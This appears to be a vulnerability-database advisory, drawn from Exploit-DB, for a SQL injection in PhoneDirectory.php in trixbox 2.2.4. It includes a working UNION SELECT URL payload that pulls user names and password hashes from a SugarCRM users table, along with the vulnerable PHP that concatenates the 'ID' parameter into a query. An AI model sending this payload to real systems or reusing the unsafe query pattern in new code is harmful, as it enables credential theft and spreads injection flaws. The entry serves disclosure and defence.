SQL Injection in PhoneDirectory.php

vendor:

PhoneDirectory.php

by:

norslacker

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: PhoneDirectory.php

Affected Version From: 2.2.4

Affected Version To: 2.2.4

Patch Exists: YES

Related CWE: N/A

CPE: trixbox.org/downloads

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

SQL Injection in PhoneDirectory.php

The PhoneDirectory.php script is vulnerable to SQL injection. An attacker can exploit this vulnerability by passing malicious SQL statements in the 'ID' parameter of the GET request. This can allow an attacker to gain access to sensitive information such as user credentials and other data stored in the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.

Source

Exploit-DB raw data:

# Software Link: http://trixbox.org/downloads
# Version: 2.2.4
# Code : 
http://server/cisco/services/PhoneDirectory.php?ID=1 [SQL INJECTION]

Example (Grab users / password hashes from sugarcrm) 
http://server/cisco/services/PhoneDirectory.php?ID=1' UNION SELECT id,user_hash AS 'first_name',last_name,phone_home,user_name AS 'phone_work',user_hash AS 'phone_mobile',phone_other FROM users WHERE 1='1' GROUP BY 'id


PhoneDirectory.php vulnerable code:
# If the variable "ID" is passed in through the GET string, then display
# extension, phone number and cell phone number for that record with the dial
# key functionality
if ($ID) {
 $PersonDirectoryListing = "<CiscoIPPhoneDirectory>\n";

 $Query = "SELECT id, first_name, last_name, phone_home, phone_work, phone_mobile, phone_other ";
 $Query .= "FROM contacts WHERE id = '$ID' ";
 $Query .= "ORDER BY last_name ";
 $SelectPersonInfo = mysql_query($Query,$ConnectionSuccess);

 ...

}

#norslacker [at] gmail [dot] com